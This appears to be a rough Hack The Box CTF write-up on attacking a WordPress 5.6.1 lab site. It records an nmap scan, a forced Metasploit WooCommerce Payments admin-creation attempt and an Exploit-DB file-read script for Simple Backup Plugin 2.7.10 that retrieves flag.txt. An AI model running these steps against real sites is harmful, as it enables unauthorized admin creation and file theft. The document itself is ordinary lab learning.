PENTEST[1]
1. Goal: find flag.txt (Platform=HTB)
2. Scan the server with Nmap
nmap -Pn -A -p43375 83.136.254.47 --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 12:49 JST
Nmap scan report for 83-136-254-47.uk-lon1.upcloud.host (83.136.254.47)
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
43375/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Getting Started – Just another WordPress site
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.6.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|general purpose
Running (JUST GUESSING): Actiontec embedded (90%), Linux 3.X|2.4.X (90%), Microsoft Windows XP|7|2012 (87%)
OS CPE: cpe:/h:actiontec:mi424wr-gen3i cpe:/o:linux:linux_kernel cpe:/o:linux:linux_kernel:3.2 cpe:/o:linux:linux_kernel:2.4.37 cpe:/o:linux:linux_kernel:4.4 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (90%), Linux 3.2 (89%), DD-WRT v24-sp2 (Linux 2.4.37) (89%), Linux 4.4 (88%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 43375/tcp)
HOP RTT ADDRESS
1 0.20 ms 172.16.159.2
2 298.16 ms 83-136-254-47.uk-lon1.upcloud.host (83.136.254.47)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.22 seconds
3. Look more closely at anything that might be vulnerable
* WordPress 5.6.1
msfconsole
search wordpress 5.6
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/wp_woocommerce_payments_add_user 2023-03-22 normal Yes Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation
4. Found a module via Metasploit search; it looked usable, so try the attack
msf6 > use auxiliary/scanner/http/wp_woocommerce_payments_add_user
msf6 auxiliary(scanner/http/wp_woocommerce_payments_add_user) >
set RHOSTS 83.136.254.47
set RPORTS 43375
set USERNAME user
set PASSWORD pass
run
[*] Running module against 83.136.254.47
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: not-vulnerable: The target is not exploitable. Server not online or not detected as wordpress "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
set ForceExploit true
run
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The target is not exploitable. Server not online or not detected as wordpress ForceExploit is enabled, proceeding with exploitation.
[*] Attempting to create an administrator user -> towa:towa123 (frank.howard@neg0r.biz)
[-] Server response:
[*] Auxiliary module execution completed
Result: the module's check failed ("not detected as wordpress") and the forced run got an empty server response, so the WooCommerce Payments plugin is most likely not installed, or is disabled, on this site. One caveat about the options above: Metasploit's HTTP modules take the target port in RPORT, not RPORTS, so the line `set RPORTS 43375` left the module on its default port 80 instead of 43375. That alone would also explain this exact check failure, so the module should be re-run with `set RPORT 43375` before the plugin is ruled out.
5. Since step 4 failed, look into the WordPress plugins
First, click through the site and check it closely
* Simple Backup Plugin 2.7.10 for WordPress
Search the web for "simple backup plugin 2.7.10 exploit"
6. Run the Python code from Exploit Database
python3 exploit.py http://83.136.254.47:43375 flag.txt 4
Got it ^ ^
Thoughts
Could I have obtained the plugin information more easily by making proper use of wpscan or similar? I still can't use the tools well, so practice, practice.
I wrote this up only roughly this time; it would be nice to be able to summarize it more like a report.